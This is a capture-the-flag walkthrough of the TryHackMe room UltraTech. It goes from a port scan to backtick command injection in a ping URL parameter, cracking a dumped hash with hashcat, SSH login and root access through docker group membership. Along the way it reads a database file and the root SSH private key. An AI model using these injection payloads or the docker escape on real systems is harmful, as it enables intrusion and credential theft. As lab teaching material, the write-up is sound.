This is a write-up of the room UltraTech from TryHackMe.

Task 1: Deploy the machine

Deploy the machine by clicking deploy.

Task 2: Enumeration

Let’s scan the box by running

┌─[root@parrot]─[~/thm/ultratech]
└──╼ #nmap -sC -sV -p- $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-11 20:05 BST
PORT      STATE SERVICE VERSION
8081/tcp  open  http    Node.js Express framework
|_http-cors: HEAD GET POST PUT DELETE PATCH
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
31331/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 15C1B7515662078EF4B5C724E2927A96
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)
...

As you can see from the output, Node.js is running on port 8081. The other port in use is 31331 where there is an apache server. If we visit the page it shows: UltraTech When we use Burpesuite, we can see that is uses 2 routes: http://10.10.27.184:8081/ping?ip=10.10.27.184 and http://10.10.27.184:8081/auth?login=user&password=password from the /partners.html page.

Task 3: Let the fun begin!

Let’s investigate the ping route. If we try http://10.10.27.184:8081/ping?ip=ls, we get ping: ls: Temporary failure in name resolution. But if we try http://10.10.27.184:8081/ping?ip=`ls`, we get ping: utech.db.sqlite: Name or service not known

To see the contents of the database, we can visit http://10.10.27.184:8081/ping?ip=`cat utech.db.sqlite`.
We get the hash f357a0*******************

If we run hashcat against the hash, it will reveal the password:

┌─[root@parrot]─[~/thm/ultratech]
└──╼ #hashcat hash /usr/share/wordlists/rockyou.txt
...
f357a0***************:n*******

We can now SSH into the room with user r00t.

Task 4: The Root of All Evil

We can now run linenum.sh to find ways of becoming root.

You can see from the output that we are part of the docker group, so we can run a command to try and escalate.

We can run docker run -v /:/mnt --rm -it bash chroot /mnt sh, this will give us the root user. We can then run cat /root/.ssh/id_rsa to ge the first 9 letters which gives us MIIEogIBA

That’s the room complete!